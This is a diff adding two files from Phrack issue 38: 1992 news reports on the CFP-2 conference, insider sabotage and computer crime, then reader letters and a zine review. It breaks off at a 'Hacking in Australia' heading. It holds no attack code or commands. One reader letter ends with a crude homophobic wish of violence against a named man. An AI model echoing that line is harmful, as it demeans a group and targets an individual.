+ CFP-2: Sterling Speaks For "The Unspeakable"                    March 25, 1992
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ By Barbara E. McMullen & John F. McMullen (Newsbytes)
+
+WASHINGTON, D.C. --  Bruce Sterling, the prime luncheon speaker at the 2nd
+Annual Conference On Computers Freedom & Privacy (CFP-2), fulfilled his program
+billing as "Speaking for the Unspeakable" by taking on three separate persona
+and delivering what might have been their messages.
+
+Sterling, best known as a science fiction writer, spoke for three characters, a
+"a malicious hacker," a Latin American police official, and a Hong Kong
+businessman, who were, in his words, "too venal, violent, treacherous, power-
+mad, suspicious, or meanspirited to receive (or accept) an invitation to
+attend."
+
+Sterling began his speech by introducing himself and then saying, "When the CFP
+committee asked me if I might recommend someone to speak here at CFP-2, I had
+an immediate candidate.  I thought it  would be great if we could all hear from
+a guy who's been known as Sergei.  Sergei was the KGB agent runner for the
+Chaos Computer Club group who broke into Cliff Stoll's computer in the famous
+Cuckoo's Egg case.  Now Sergei is described as a stocky bearded Russian
+espionage professional in his mid-40s.  He's married, has kids and his hobby
+is fishing, in more senses than one, apparently.  Sergei used to operate out of
+East Berlin, and, as far as I personally know, Sergei's operation was the
+world's first and only actual no-kidding, real-life case of international
+computer espionage.  So I figured -- why not send Yelsin a fax and offer Sergei
+some hard currency; things are pretty lean over at KGB First Directorate these
+days.  CFP could have flown this guy in from Moscow on a travel scholarship and
+I'm sure that a speech from Sergei would be far more interesting than anything
+I'm likely to offer here.  My proposal wasn't taken up and instead I was asked
+to speak here myself.  Too bad!
+
+"This struck me as rather a bad precedent for CFP which has struggled hard to
+maintain a broad universality of taste.  Whereas you're apparently willing to
+tolerate science fiction writers, but already certain members of the computer
+community, KGB agents, are being quietly placed beyond the pale.  But you know,
+ladies and gentlemen, just because you ignore someone doesn't mean that person
+ceases to exist -- and you've not converted someone's beliefs merely because
+you won't listen.  But instead of Comrade Sergei, here I am -- and I am a
+science fiction writer and, because of that, I rejoice in a complete lack of
+any kind of creditability!
+
+"Today I hope to make the best of that anomalous position.  Like other kinds of
+court jesters, science fiction writers are sometimes allowed to speak certain
+kinds of unspeakable truth, if only an apparent parody or metaphor.  So today,
+ladies and gentlemen, I will exercise my inalienable civil rights as a science
+fiction writer to speak up on behalf of the excluded and the incredible.  In
+fact, I plan to abuse my talents as a writer of fiction to actually recreate
+some of these excluded, incredible unspeakable people for you and to have them
+address you today. I want these people, three of them, to each briefly address
+this group just as if they were legitimately invited here and just as if they
+could truly speak their mind right here in public without being arrested."
+
+Sterling then went on to assure the crowd that he was not speaking his personal
+conviction, only those of his characters, and warned the group that some of the
+material might be offensive.  He then launched into the delivery of his
+characters' speeches -- speeches which had the hacker talking about real damage
+-- "the derailing of trains"; the Latin police official, a friend and admirer
+of Noriega, discussing the proper way of dealing with hackers; and the
+businessman explaining way, in the age of high speed copiers, laser printers
+and diskette copying devices, the US copyright laws are irrelevant.
+
+Often intercepted by laughter and applause, Sterling received a standing
+ovation at the conclusion of the speech.  Computer Press Association newsletter
+editor Barbara McMullen was overhead telling Sterling that he had replaced
+"Alan Kay as her favorite luncheon speaker," while conference chair Lance
+Hoffman, who had received an advance copy of the speech a few weeks before,
+described the speech as "incredible and tremendous".
+
+Sterling, relaxing after the talk with a glass of Jack Daniels, told Newsbytes
+that the speech had been fun but a strain, adding, "Next time they'll really
+have to get Sergei.  I'm going back to fiction."
+
+Sterling's non-fiction work on computer crime, "The Hacker Crackdown" is due
+out from Bantam in the fall and an audio tape of the CFP-2 speech is available
+>from Audio Archives.  He is the author of "Islands In The Net" and is the co-
+author, with William Gibson, of the presently best-selling "The Difference
+Engine."
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+The Bruce Sterling luncheon video tape is now available, sizzling, and
+affordable to the Phrack readers.
+
+     $19.95 + $4 (shipping and handling)
+
+     Call now:  (800)235-4922
+                      or
+                CFP Video Library Project
+                P.O. Box 912
+                Topanga, CA  90290
+
+Tell them you heard about it from The WELL and you'll get the above price.
+_______________________________________________________________________________
+
+ CFP-2 Features Role-Playing FBI Scenario                        March 25, 1992
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ By Barbara E. McMullen (Newsbytes)
+
+WASHINGTON, D.C.-- As part of the "Birds-of-a-Feather" (BOF) sessions featured
+at the 2nd Conference on Computers, Freedom & Privacy (CFP-2), FBI Agent J.
+Michael Gibbons, acting as a live gamemaster, orchestrated the play-acting of
+an investigation by federal agents into allegations of computer intrusion and
+criminal activity.
+
+The scenario, set up by Gibbons to show the difficulties faced by investigators
+in balancing the conducting of an investigation with a protection of the rights
+of the individual under investigation, was acted out with non-law enforcement
+officials cast in the role of investigators; New York State Police Senior
+Investigator Donald Delaney as "Doctor Doom," the suspected ringleader of the
+computer criminals; Newsbytes New York Bureau Chief John McMullen as a
+magistrate responsible for considering the investigators' request for a search
+warrant; and author Bruce Sterling as a neighbor and possible cohort of Doctor
+Doom.
+
+Gibbons, in his role of Gamemaster, regularly intercepted the action to involve
+the audience in a discussion of what the appropriate next step in the scenario
+would be -- "Do you visit the suspect or get a search warrant or visit his
+school or employer to obtain more information?  Do you take books in the search
+and seizure?  Printers?  Monitors?  etc."  During the discussion with the
+audience, points of law were clarified by Mike Godwin, Electronic Frontier
+Foundation in-house counsel, and Alameda County Assistant District Attorney
+Donald Ingraham.
+
+The role-playing session immediately followed a BOF panel, "Hackers:  Why Don't
+They Understand" which attempted to present a hacker view of on-line ethics.
+The panel, moderated by McMullen, was composed of Steven Levy, MacWorld
+columnist and author of "Hackers"; Dorothy Denning, Chair of Computer Science
+at Georgetown University; Glenn Tenney, California Congressional candidate and
+chair of the annual "Hacker's Conference"; Craig Neidorf, defendant in a
+controversial case involving the electronic publishing of a stolen document;
+"Dispater," the publisher of the electronic publication "Phrack"; Emmanuel
+Goldstein, editor and publisher of "2600: The Hacker Quarterly," and hacker
+"Phiber Optik."
+
+During the panel discussion, Levy, Denning and Tenney discussed the roots of
+the activities that we now refer to as hacking, Goldstein and Dispater
+described what they understood as hacking and asked for an end to what they see
+as overreaction by the law enforcement community, Neidorf discussed the case
+which, although dropped by the government, has left him over $50,000 in debt;
+and Phiber Optik described the details of two searches and seizures of his
+computer equipment and his 1991 arrest by Delaney.
+
+In Neidorf's talk, he called attention to the methods used in valuing the
+stolen document that he published as $78,000.  He said that it came out after
+the trial that the $78,000 included the full value of the laser printer on
+which it was printed, the cost of the word processing system used in its
+production and the cost of the workstation on which it was entered.  Neidorf's
+claims were substantiated by EFF counsel Godwin, whose filing of a motion in
+the Steve Jackson cases caused the release of papers including the one referred
+to by Neidorf.  Godwin also pointed out that it was the disclosure by
+interested party John Nagle that the document, valued at $78,000, was
+obtainable in a book priced at under $20.00 that led to the dropping of the
+charges by the US Attorney's office.
+
+SRI security consultant Donn Parker, one of the many in the audience to
+participate, admonished Phiber and other hackers to use their demonstrated
+talents constructively and to complete an education that will prepare them for
+employment in the computer industry.  Another audience member, Charles Conn,
+described his feeling of exhilaration when, as a 12-year old, he "hacked" into
+a computer at a local Kentucky Fried Chicken.  Conn said "It was wonderful.  It
+was like a drug. I just wanted to explore more and more."
+
+Parker later told Newsbytes that he thought that it was a mistake to put
+hackers such as Phiber Optik and those like Craig Neidorf who glorify hackers
+on a panel.  Parker said, "Putting them on a panel glorifies them to other
+hackers and makes the problem worse."
+
+The Birds-of-a-Feather sessions were designed to provide an opportunity for
+discussions of topics that were not a part of the formal CFP-2 program.
+_______________________________________________________________________________
+
+ Computer Revenge A Growing Threat                                March 9, 1992
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ By Tom Steinert-Threlkeld (Dallas Morning News)
+ Article in the Chicago Tribune, Page C3
+
+The "downsizing" of corporate America is not only making companies lean and
+mean.
+
+It's doing the same thing to employees losing their jobs, said Thomas F. Ellis,
+a partner in Arthur Andersen & Co.'s Computer Risk Management Services.
+
+He looks at the latest form of revenge by employee against former employer.
+Fraud, embezzlement and theft of secrets are no longer the only forms of
+frustrated payback.  The calling card in the digital age is computer sabotage.
+
+It's an invisible epidemic that corporations don't like to talk about while
+they're trying to convince banks and creditors they are becoming more efficient
+by downsizing, said Ellis and William Hugh Murray, information systems security
+consultant to Deloitte & Touche, another of the Big Six accounting firms.
+
+"A lot of the business trends in the U.S. are really threatening data
+security," said Sanford M. Sherizen, a Natick, Massachusetts computer security
+consultant.  "Corporations are paying a huge price for it," without disclosing
+it.
+
+The downsizing has led to inadequate attention to security precautions, argues
+Sherizen.  The underlying trend:  Fewer and fewer people are being given more
+and more responsibility for information systems.
+
+That breeds opportunity for revenge, said Sherizen.  No longer does only the
+supposedly misfit hacker, gulping down Cokes and Fritos in the middle of the
+night, merit watching.  Sherizen's worldwide set of clients have found that the
+middle manager wearing the white shirt and tie in the middle of the day also
+deserves scrutiny, he says.
+
+Those managers, if mistreated, find it inviting to strike back creatively.  The
+VTOC, for example.
+
+This is jargon for the Volume Table of Contents.  This is a directory a
+computer compiles to keep track of where programs and data are stored.  A large
+Andersen client was paralyzed recently when a VTOC in its information system
+was scrambled by a downsizing victim, Ellis said.
+
+"If you destroy the VTOC in a mainframe system, then you destroy the computer's
+ability to go out and find programs and data, so you can pretty effectively
+devastate a computer installation by destroying the VTOC, without ever touching
+the programs and data," he said.
+
+But those bent on revenge are not above leaving time bombs in computer systems
+that will go off after their departure, destroying programs and data.
+
+They also are appropriating information from magnetic memories and selling it
+at hefty prices in the burgeoning field known euphemistically as "commercial
+business intelligence," said Sherizen.
+
+Most companies hush up these cases, because they fear copycat avengers will
+strike when their vulnerability is exposed.  They also don't like to be
+publicly embarrassed, the security experts say.
+
+Technical safeguards don't hold a candle to human safeguards, said Murray.
+
+The best way to protect against sabotage is to prevent disaffection in the
+first place.  Treat as well as possible those who are being fired.  Compensate
+fairly those who are staying.
+
+Show appreciation, day in and day out.  Most revenge is slow to boil and comes
+>from employees who finally conclude that their contributions are going
+unrecognized, said Murray.
+
+"Saying 'please' and 'thank you' are an incredibly important control" against
+sabotage, he said.
+_______________________________________________________________________________
+
+ Computer Crime Problem Highlighted                               March 9, 1992
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ By Oscar Rojo (Toronto Star)(Page B3)
+
+With the growing corporate dependence on computers, "information crimes" have
+become easier to commit but harder to detect, says a Toronto-based security
+company.
+
+"Electronic intrusion is probably the most serious threat to companies that
+rely on computerized information systems," Intercon Security Ltd. says in its
+Allpoints publication.
+
+Allpoints cited a study of 900 businesses and law enforcement agencies in
+Florida showing that one of four businesses had been the victim of some form of
+computer crime.
+
+"While most of the media attention has focused on "hackers," individuals who
+deliberately and maliciously try to disrupt business and government systems,
+one estimate indicates that 75 per cent plus of electronic intrusion crimes may
+be "insider attacks" by disgruntled employees," the publication said.
+
+In Intercon's experience, vice-president Richard Chenoweth said the company is
+as likely to find a corporate crime committed by a disgruntled employee as one
+perpetrated by an outsider.
+
+Intercon said the technology exists to guard against most electronic
+intrusions.  "The problem is that many information managers still don't believe
+there is a risk, so they are not making the best possible use of what is
+available."
+_______________________________________________________________________________
+
+ Criminals Move Into Cyberspace                                   April 3, 1992
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ By Mick Hurrell (The Times)(Features Section)
+
+The hacker and the virus programmer embodied the popular notion of computer
+crime in the 1980s, and they are still the most widely known criminal acts in
+computer technology.
+
+The advent of new technologies over the past decade has created a whole new
+casebook of serious crimes, but they have yet to gain the notoriety of computer
+viruses such as Friday 13th or Michelangelo.
+
+More then 3,000 computer crimes around the world in the past 20 years have now
+been documented by SRI International (SRII), a Californian information security
+consultancy.  They include attempted murder, fraud, theft, sabotage, espionage,
+extortion, conspiracy and ransom collection.
+
+Against this disturbing background, Donn Parker, SRII's senior international
+security consultant, is telling businesses they will be under increasing attack
+>from sophisticated criminals using computer technology and from others intent
+on causing disruption.
+
+"New technology brings new opportunities for crime," he says.  "We must
+anticipate future types of crime in our security efforts before they become
+serious problems."
+
+His prospective list ranges from the annoying to the fraudulent, and includes
+small computer theft, desktop forgery, digital imaging piracy, voice and
+electronic mail terrorism, fax graffiti attacks, electronic data interchange
+fraud, and placement of unauthorized equipment in networks.
+
+Some of these crimes are more obvious than others.  The advanced digital
+imaging systems now being used in the television and film industry to create
+spectacular special effects, for example, could become a new target for crime.
+As digital imaging can alter video images seamlessly, the possibilities for
+sophisticated fraud are numerous.
+
+The theft of small computers and components has already increased.  "I think
+it will be worse than the typewriter theft problem of the 1970s and 1980s," Mr.
+Parker says.  "We are now teaching information-security people that they have
+to learn how to protect small objects of high value.  The content of the
+computers could be more valuable than the hardware itself.
+
+"I do not think the criminal community is yet aware of a computer's value other
+than on the used equipment market, but ultimately some are going to figure out
+that the contents the data are more valuable, which could lead to information
+being used for extortion."
+
+Desktop forgery is another crime that looks certain to boom and plague
+businesses of all types.  Desktop publishing software, combined with the latest
+color laser printers and photocopiers, is proving an ideal forger's tool.  Gone
+is the dingy cellar with printing plates and press:  Forgers can work from
+comfortable offices or their own homes and produce more accurate fakes than
+ever before.
+
+Original documents can be fed into a computer using a scanner, then subtly
+altered before being printed out.  Business documents such as purchase orders
+and invoices are obvious targets for the forgers, as are checks.  The quality
+of a forgery is now limited only by the paper on which it is printed.
+
+Mr. Parker says:  "As the technology gets cheaper and more available, this is
+something that could flourish."
+
+But although many of these new forms of computer crime bring with them the
+possibility of increased business losses, one threat overshadows them all. "The
+big security issues are going to involve networks and the connection of
+computers to many others outside an organization," says Rod Perry, a partner
+with Coopers & Lybrand Deloitte, the consultants.
+
+The fear is that sophisticated criminals will take advantage of a clash between
+the desire for system flexibility and the constraint necessarily imposed by
+security.  Mr. Perry adds:  "The business need is paramount, and people will
+accept the risk up to a point."
+
+Networks are attractive because they allow information to be easily transferred
+between users, and give free and easy access to data bases from many locations
+within an organization that can extend across countries and continents.  Making
+them secure against interference from both outside and within is difficult.
+
+Mr. Parker says:  "Today's microcomputers and local and global networks have
+left information security far behind.  We are dealing with what we call
+cyberspace.  We are connecting our networks so that we now have a single
+worldwide network of data communications.
+
+"We have inadvertently freed the criminal from proximity to the crime.  A
+criminal can be anywhere in the world, enter cyberspace by computer, and commit
+a crime anywhere else.  The criminal is free to choose the jurisdiction area
+>from which he works, to minimize the punishment if he gets caught."
+
+The great concern, he says, is if technological advances result in an "anarchy
+of conflicting security efforts.  Consistent security practices should be
+applied uniformly as well as globally.
+
+"When organizations in different countries with different national laws,
+different ways of valuing information assets, and different national ethical
+customs, use equipment from different manufacturers in their networks, they
+face the problem of matching their levels of security.  They use the lowest
+common denominator, which in some instances may be practically non-existent."
+
+Some computer security consultants believe that network security headaches will
+involve some restriction in how they are used.  All agree that passwords no
+longer offer appropriate forms of security.
+
+Professor Roger Needham, of the University of Cambridge computing laboratory,
+says:  "At the moment, there is a lot of shoddy computer use, but it will
+become more usual to take security seriously.  In the world of doing business
+with paper, there are a tremendous number of rules of practice and conduct that
+are second nature; security procedures in the electronic medium will also have
+to become second nature."
+
+SRII is developing software for what it says will be the world's most
+sophisticated detection system, designed to identify criminal users as they
+commit their crime.
+
+Called IDES (Intruder Detection using Expert Systems), it works on the basis
+that a system intruder is likely to show a different behavior pattern from that
+of a legitimate user.  IDES is programmed with a set of algorithms that build
+up profiles of how particular employees typically use the system.  It can then
+inform the company's security division if it identifies any significant
+deviation.
+
+IDES also monitors the whole system for failed log-in attempts and the amount
+of processor time being used, and compares this with historical averages.
+
+A future refinement will allow the system to profile groups of subjects so that
+it can tell, for example, when a secretary is not behaving like a "typical"
+secretary.
+
+Business crime and computer crime will increasingly become one and the same,
+Mr. Parker says.  Security will be increasingly built in to systems and
+"transparent" to the user.
+
+"I think the overall loss to business from computer crime will decrease," he
+says.  "But the loss per incident will increase because the risks and the
+potential gains will be greater."
+_______________________________________________________________________________
+
+ PWN QuickNotes
+ ~~~~~~~~~~~~~~
+1. New Law Enforcement Bulletin Board (Government Technology, January 1992,
+   Page 17) -- St. Paul, Minnesota -- The International Association of Chiefs
+   of Police (IACP) and LOGIN Information Services has announced IACP NET, a
+   new computer network that will link law enforcement professionals
+   nationwide.  The network uses advanced computer capabilities to foster and
+   empower IACP's belief that strength through cooperation is the key to the
+   success of law enforcement endeavors.
+
+   Communications services will be the interaction focus.  An electronic mail
+   feature allows private messaging among IACP NET members.  Exchange of ideas
+   will be encouraged and facilitated through electronic bulletin boards on
+   general subject areas and computer conferencing on specific topics.
+   Anchoring the communications service is the Quest-Response Service, a
+   service created and proven successful by LOGIN that allows members to post
+   and respond to requests for information in a formatted and accessible
+   manner.
+_______________________________________________________________________________
+
+2. ATMs Gobble Bankcards In Colorado (Denver Post, February 19, 1992) -- About
+   1,000 Colorado ATM users had their Visas and Mastercards abruptly terminated
+   in February by an out-of-control computer system.
+
+   For 90 minutes during the President's Day weekend, the Rocky Mountain
+   Bankcard System software told ATMS around the state to eat the cards instead
+   of dishing out cash or taking deposits.  The "once-in-a-decade" glitch went
+   unnoticed because it occurred as programmers were patching in a correction
+   to a different problem.
+
+   The company is rushing new plastic and letters of apology to customers who
+   got terminated.
+_______________________________________________________________________________
+
+3. Minister Denies Hackers Tampered With Licence Records (Chris Moncrieff,
+   Press Association, January 27, 1992) -- Allegations that computer experts
+   hacked into the records of the Driver and Vehicle Licensing Agency in
+   Swansea are without substance and are to be retracted, Roads and Traffic
+   Minister Christopher Chope said.
+
+   He was responding in a Commons-written reply to Donald Anderson (Lab Swansea
+   East), who had asked what investigations had been made following a report
+   that hackers had been able to erase driving convictions from DVLA computer
+   files.  Mr. Chope said, "The Agency has discussed the recent allegations
+   about unauthorized access to its computer records with the author of the
+   original Police Review article, who has confirmed that there is no substance
+   to them.  "The author has agreed to retract the allegations in his next
+   article."  Mr. Anderson commented, "The importance of this reply is that it
+   underlines the integrity of the system of driver-licence records held in
+   Swansea in spite of the allegations."
+_______________________________________________________________________________
+
+4. Software Virus Found At INTEL (New York Times News Service, March 3, 1992)
+   --  Intel Corporation said it had stopped shipping a computer network
+   software program because some units were found to be infected with the
+   "Michelangelo" virus, a program that infects IBM and compatible personal
+   computers and can potentially destroy data.
+
+   A division of Intel in Hillsboro, Oregon, said it had shipped more than 800
+   copies of the program, called LANSpool 3.01, which inadvertently contained
+   the virus.  The virus is designed to activate on March 6, Michelangelo's
+   birthday, and can erase data and programs if it is not detected with
+   antiviral software.
+
+   The company said it had checked its software with a virus-scanning program
+   before shipping it, but that it had failed to detect the virus.
+
+   A number of computer makers and software publishers have issued similar
+   alerts about the Michelangelo program and a variety of companies are now
+   offering free software to check for the virus.
+
+   There are more than 1,000 known software viruses that can copy themselves
+   from computer to computer by attaching to programs and files.
+_______________________________________________________________________________
+
+5. Army Wants Virii (Bulletin of the Atomic Scientists, December 1991, Page 5)
+
+                   "Attention Hackers, Uncle Sam Wants You!"
+
+   The U.S. Army has caught the computer virus bug and is now expanding its
+   interest in germ warfare to include electronic germs.
+
+   The Army Center for Signal Warfare is soliciting proposals for the
+   development of a "weaponized virus" or a piece of "malicious software" that
+   could destroy an enemy's computers or software (_Technology Review_, October
+   1991).  As project engineer Bob Hein explained, "This is the army.  We're in
+   the weapons business."
+
+   Hein said the army first became interested in the potential of computer
+   viruses as offensive weapons after Myron Cramer's 1989 article in _Defense
+   Electronics_ suggested that computer viruses offered "a new class of
+   electronic warfare."  But Gary Chapman, director of Computer Professionals
+   for Social Responsibility, thinks it is more likely that the army's interest
+   was piqued by a French science fiction novel, _Soft War_, describing army
+   infiltration of Soviet computers.
+
+   Chapman, who called that army's plan to design killer computer viruses a
+   "stupid policy," said that any viruses the army comes up with are more
+   likely to paralyze the heavily networked U.S. computer system than to
+   infiltrate enemy computers.
+
+   Hein insisted that the army will develop only controllable and predictable
+   bugs that will not threaten U.S. computer users.  Chapman pointed out that,
+   like the biological agents they are named for, computer viruses are, by
+   their very nature, uncontrollable.
+_______________________________________________________________________________
+
+6. BellSouth's MobilComm and Swiss watchmaker Swatch said they will form joint
+   venture to market wristwatch pager.  The watch will cost about $200 and will
+   be sold in department stores.  It will bear name of "Piepser," the German
+   word for "beeper," using 4 tones to signal the wearer.  Each signal is
+   activated by a telephone number that owner assigns.  In the 4th quarter of
+   year, Swatch said it plans to introduce a model that can display telephone
+   numbers.  (Source: Communications Daily, March 5, 1992, Page 4)
+_______________________________________________________________________________
+
+7. U.S. District Judge Harold Greene denied several new motions by Nynex in a
+   criminal case being brought by the Justice Department, charging the phone
+   company with violating MFJ (Modified Final Judgment) through subsidiary
+   Telco Research.  The government also filed a new motion of its own, later
+   denied, requesting Greene to hold a pretrial hearing to look into "actual or
+   potential conflicts of interest" resulting from individuals to be called as
+   witnesses for prosecution being represented by Nynex's law firm, Davis, Polk
+   & Wardwell.  DoJ said:  "It appears that Davis, Polk represents present and
+   former employes of Nynex in addition to the corporation."  Nynex issued a
+   statement saying it's "confident" that the trial would "confirm to our
+   customers," shareholders, and the public that it has fully met its
+   responsibilities under MFJ.  Greene, having dismissed Nynex motions, set
+   an April 6 trial date.  (Communications Daily, March 24, 1992, Page 5)
+_______________________________________________________________________________
+
+8. US West has formed a subsidiary, US West Enhanced Services, that launched
+   its first product, Fax Mail.  The subsidiary will develop other products for
+   the enhanced-services market, including voice, fax and data applications,
+   the company said.  Test marketing of Fax Mail was conducted in Boise and was
+   product-introduced in Denver.  US West described its new product as "voice
+   mail for faxes," in that it stores incoming faxes until the subscriber calls
+   in and instructs the service to print the waiting fax.  Each fax mail
+   subscriber is supplied with a personal fax telephone number.  When a fax is
+   received, Fax Mail can notify the subscriber automatically by depositing a
+   message in voice mail or beeping a pager.  The service costs $19.95 per
+   month, US West said.  (Communications Daily, March 24, 1992, Page 6)
+_______________________________________________________________________________
+
+9. Hacker Insurance -- Worried about the integrity of your bank's data network?
+   Relax.  Commercial banks and other depository institutions can now obtain up
+   to $50 million in coverage for losses due to computer-related crime.  A new
+   policy from Aetna Casualty and Surety Co. offers insurance against computer
+   viruses, software piracy, and toll-call fraud, among other high-tech rip-
+   offs.  The Hartford, Connecticut insurer will also cover liabilities due to
+   service bureau and communications failures with Aetna Coverage for Computer
+   and Electronic Network Technology.  Paul A. Healy, VP of Aetna's fidelity
+   bond unit, says "the policy will help institutions manage the risk
+   associated with the changing technology."  (Information Week, March 30,
+   1992, Page 16)
+_______________________________________________________________________________
+
diff --git a/phrack38/2.txt b/phrack38/2.txt
new file mode 100644
index 0000000..c635745
--- /dev/null
+++ b/phrack38/2.txt
@@ -0,0 +1,349 @@
+                                ==Phrack Inc.==
+
+                 Volume Four, Issue Thirty-Eight, File 2 of 15
+
+                          [-=:< Phrack Loopback >:=-]
+
+                                By Phrack Staff
+
+     Phrack Loopback is a forum for you, the reader, to ask questions, air
+problems, and talk about what ever topic you would like to discuss.  This is
+also the place Phrack Staff will make suggestions to you by reviewing various
+items of note; magazines, software, catalogs, hardware, etc.
+_______________________________________________________________________________
+
+ Terminus Is Free
+ ~~~~~~~~~~~~~~~~
+Len Rose has been released from prison as of March 23, 1992.  Those wishing to
+write him and send him U.S. mail:
+
+Len Rose
+Salvation Army Freedom Center
+105 Ashland
+Chicago, Illinois  60607
+
+He will remain at this address until May 23, 1992.
+_______________________________________________________________________________
+
+Date: March 4, 1992
+From: Sarlo
+To: Phrack Staff
+Subject: Loopback Correction
+
+While scanning the loopback section of Issue 37, I came across this letter:
+
+
+>:: Fed Proof Your BBS, NOT! ::
+>
+>     I'm sure many of you have seen text files on making your BBS more secure.
+>One such file floating around is by Babbs Boy of Midnight Society.  One of the
+>members of our Phrack Staff showed this document to EFF's Mike Godwin, who is
+>an attorney.  He had the following comments:
+
+>- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+>
+>From: Mike Godwin
+>To: Phrack Inc.
+>
+>(In regards to some of the files about how to "fed-proof" your BBS:)
+>
+>>  Let's start with the log on screen:  If FEDZ want anything from your board,
+>>  they are required to provide 100% accurate information.
+>
+>This is false.  Ask the legislators who've been convicted in "sting"
+>operations.  In fact, so far as I can tell in a brief run-through of this
+>document, absolutely no part of the so-called "legal" advice is true.
+>
+>Law enforcement agents who misrepresent their identities (e.g., "undercover
+>agents") produce admissible evidence all the time.
+>
+>--Mike
+
+
+Allow me to clear some things up.  Babbs' Boy was a friend of mine a while back
+and was more of a Game Programmer than a "hacker" (or "cracker," if you want
+to be anal about it).  Babbs' Boy was NEVER in MsU.  He had asked me if he
+could write a file for the group.  We informed him that he could if he wanted
+to, but he could in no way represent us.  According to Babbs' Boy, he retrieved
+the information from a copy of the ECPA.  Since we were not releasing that as a
+MsU file, we never bothered to check any of the said information out.  In fact,
+MsU does not create files for public display, although individual members may.
+
+Apparently Babbs' Boy uploaded his copy of the document to Ripco, in which
+it went wideband from there.  I am told that 3 other documents were released
+in MSU's name, by someone using one of my very old handles of Raistlin.  I can
+assure you that these documents were not released by any legitimate (old or
+current) member of Midnight Society Underground.
+
+Again, to clear things up, Babbs' is not nor ever was a member of MsU, nor
+are there any legitimate public releases from our group.
+
+Besides, we don't let people in the group who spell Feds "FEDZ" ..the shit just
+ain't done.
+
+Sarlo of Midnight Society Underground [MsU]
+
+sarlo@gagme.chi.il.us
+_______________________________________________________________________________
+
+Date: March 22, 1992
+From: "Michael E. Marotta" <MERCURY@lcc.edu>
+Subject: Censorship in Cyberspace
+To: Phrack Staff
+
+I have been hired to write an article about the control of information in
+cyberspace.  We all know that Fidonet moderators and sysops devote their OWN
+resources for us to use.  There is no question about the "right" of the sysop
+or moderator to delete messages and users.  The practice of censorship is
+nonetheless newsworthy.
+
+If YOU have experienced censorship on Fidonet or Usenet, Prodigy or CompuServe,
+or another BBS or network, I am interested in learning about your story.  If
+you can supply downloads of actual encounters, so much the better.
+
+If you have ever been censored, send me physical world mail about the event.
+
+               Michael E. Marotta
+               5751 Richwood  #34
+               Lansing, Mich. 48911
+_______________________________________________________________________________
+
+Dear Phrack Staff,
+
+There are very serious negative consequences surrounding the use of modems
+and computers in our society.  Because of this, all children under the age
+of 18 should be prohibited from using a computer in connection with a modem
+or that is connected to any computer service.
+
+Please read my attached news release and join me in spreading this message.
+
+-- Ron Hults
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+NEWS RELEASE                                                     March 18, 1992
+
+
+PEDOPHILIA, COMPUTERS, AND CHILDREN
+
+If you have children in your home and a home computer complete with a telephone
+modem, your child is in potential danger of coming in contact with deviant and
+dangerous criminals.
+
+Using the computer modem, these unsavory individuals can communicate directly
+with your child without your knowledge.  Just as importantly, you should be
+concerned if your child has a friendship with other youth who has access to
+this equipment in an unsupervised environment.
+
+Using a computer and a modem, your child can readily access community "bulletin
+boards" and receive sexually explicit and graphic material from total strangers
+who can converse with your children, individuals you quite probably wouldn't
+even talk with.
+
+The concern becomes more poignant when stated otherwise; would you let a child
+molester, murderer, or convicted criminal into your home to meet alone with
+your child?
+
+According to Fresno Police Detective Frank Clark, "your child can be in real
+danger from pedophiles, rapists, satanic cultists and other criminals known to
+be actively engaged in computer conversation.  Unwittingly, naive children with
+a natural curiosity can be victimized; emerging healthy sexual feelings of a
+child can be subverted into a twisted, unnatural fetish affecting youth during
+a vulnerable time in their lives."
+
+It is anticipated that parents, when armed with the knowledge that this
+activity exists and awareness that encounters with such deviant individuals
+can result in emotional and psychological damage to their child, will take
+appropriate measures to eliminate the possibility of strangers interacting with
+their children via a computer.
+
+For Further Information, contact Ron Hults (209)498-4568
+_______________________________________________________________________________
+
+Date: March 30, 1992
+From: Anonymous
+To: Knight Lightning <kl@stormking.com>
+Subject: Thanks
+
+Dear Knight Lightning,
+
+I would like to thank you for the message you wrote to Dale (scumbag) Drew.
+Although the fact is that he will only be slightly inconvenienced by having to
+dig up issues of Phrack on his own instead of having them delivered to his
+mailbox, his being refused to be added to the mailing list means a lot more. If
+I were him, I would consider it a slap in the face (since it seems almost as
+bad, IMO, as being blacklisted).  :)
+
+May he run into 10 homosexual wrestlers in a dark alley.
+_______________________________________________________________________________
+
+ Review of Intertek Winter 1992
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ 325 Ellwood Beach, #3                          Subscription Rates:
+ Goleta, CA  93117                              US : 4 issues (2 year) $14.00.
+ Internet: steve@cs.ucsb.edu                    OS : 4 issues (2 year) $18.20.
+ Phone: 805-685-6557                            Back issues : $5.00 ea.
+
+ by Dispater
+
+     Intertek is the *SHARPEST* looking 'zine I've seen yet that directly
+addresses the world of cyberspace.  It's not "high res" color or artsy-fartsy
+like Mondo 2000, but it is at least more interesting to read as a whole.  I
+think it looks better and is more direct and to the point.  You don't have to
+wade through a bunch of trash to get to something interresting.
+
+     This issue of Intertek focused on "virtual communities."  The topics
+included:  "Bury USENET," "Electropolis (IRC)," "Social Organization of the
+Computer Underground" by Gordon Meyer, "Real World Kerberos," and "Mudding:
+Social Phenomena in Text-Based Virtual Realities."  Every issue also contains
+the top news tidbits about some truly high-tech achievements that go unnoticed
+by the mainstream media (I guess the Mike Tyson trial gets more ratings,
+huh?).  All in all, it was much more interesting to me than the last issue
+(Volume 3.2).  It's magazines like this that I hope will help make the
+mainstream media obsolete.
+
+     If you are looking for "how-to" techie projects or hacking tips, this is
+NOT for you!  Many hackers I know don't like it and think it's boring as hell;
+2600 and Phrack it isn't.  However, if you are interested in the "big picture"
+of the cyberspace (what ever that means! :) or are, say, interested in studying
+cyberspace from an uninvolved level, this is the magazine for you. Intertek is
+full of social insight into what makes the cyberspace tick.  It does this much
+better than the feeble attempts other magazines have made.  For only $7.00 a
+year, I think it's worth it.
+
+_______________________________________________________________________________
+
+ Hacking in Australia
+ ~~~~~~~~~~~~~~~~~~~~
+ By The Cure
+
